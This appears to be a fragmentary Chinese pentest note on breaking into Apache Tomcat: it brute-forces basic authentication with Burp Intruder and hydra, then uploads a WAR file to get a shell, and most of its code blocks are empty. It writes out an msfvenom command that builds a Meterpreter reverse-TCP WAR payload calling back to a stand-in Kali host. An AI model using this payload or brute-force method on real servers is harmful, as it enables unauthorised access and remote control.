info enum
1 |
|
当时采取的方式是,通过python脚本,将字典处理为“admin:admin”类似的形式,然后再编码一次。
方(偷)便(懒)起见,用burp intruder模块爆破。
缺点:如果字典过大,burp总是会卡死==
现在又遇到了apache认证,观察以下数据包。
1 |
|
暴力破解脚本
1 |
|
hydra
1 |
|
获得弱密码,就可以登陆服务器
上传命令执行脚本
war file是打包好的java代码。select war file to upload
用msfvenom生成war payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali-ip LPORT=9001 -f war -o xx.war
msfvenom
它用于生成payload。参考资料
msfvenom -l payload
查看所有攻击载荷
msfvenom -l formats
获取shell
1 |
|
当上传成功xx.war,就可以访问以下地址,获得一个shell。
http://target.com:8080/xx/krnlxctxgebr.jsp
1 |
|